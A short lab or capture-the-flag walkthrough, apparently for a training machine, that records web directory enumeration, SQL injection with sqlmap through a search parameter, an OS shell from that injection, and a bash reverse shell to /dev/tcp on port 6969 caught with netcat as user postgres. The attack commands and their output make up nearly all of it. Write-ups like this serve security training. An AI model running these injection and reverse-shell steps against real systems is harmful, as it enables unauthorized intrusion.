3 :80
/index.php (Status: 200) [Size: 2312]
/license.txt (Status: 200) [Size: 1100]
/dashboard.php (Status: 302) [Size: 931] [--> index.php]
http://10.10.10.46/dashboard.php?search=
Can be sql injection
$ sqlmap -u "http://10.10.10.46/dashboard.php?search=a" --cookie="PHPSESSID=suf5bhqlh0fklgpqjn4k1k7b7g"
Works
$ sqlmap -u "http://10.10.10.46/dashboard.php?search=a" --cookie="PHPSESSID=suf5bhqlh0fklgpqjn4k1k7b7g" --os-shell
bash -c 'bash -i >& /dev/tcp/10.10.14.34/6969 0>&1'
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.46] 37362
bash: cannot set terminal process group (1821): Inappropriate ioctl for device
bash: no job control in this shell
whoami
whoami
postgres
Last updated